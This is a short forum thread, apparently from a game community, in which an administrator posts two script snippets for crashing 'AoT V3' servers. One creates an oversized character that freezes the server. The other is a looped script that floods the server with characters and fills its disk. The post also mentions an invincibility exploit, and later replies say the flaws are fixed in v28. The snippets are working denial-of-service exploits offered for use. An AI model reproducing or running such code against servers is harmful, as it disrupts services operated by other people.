Author Topic: How to crash AoT V3  (Read 1448 times)

Badspot

  • Administrator
Code: [Select]
CommandToServer('newCharacter', "name", "pass", 0, 0, 0, 1000,1000,1000);Creates a huge character and thus a huge collision query which will freeze the server.

Code: [Select]
function foo() { commandToServer('newCharacter', getRandom(10000), getRandom(10000) ); commandToServer('logout'); schedule(10, 0, foo); }
foo();
Continuously creates crap characters.  Fills up the server hard drive + slows it down. 

Plus there's all the old exploits you can do like logging in and out while you're connecting to become invincible to stun baton.
Have fun!


Now all the v3 servers will die too D:
Mabey there were no bugs and Badspot wanted to kill AoT permanently so we could have new shiny retail AoT, only $29.99!

Oh noes if there is retail AoT the FourmFallers will come back D:

I know how to fix those.

I know how to fix those.

Don't you feel special?

So does Badspot, thats why they are all fixed in v28.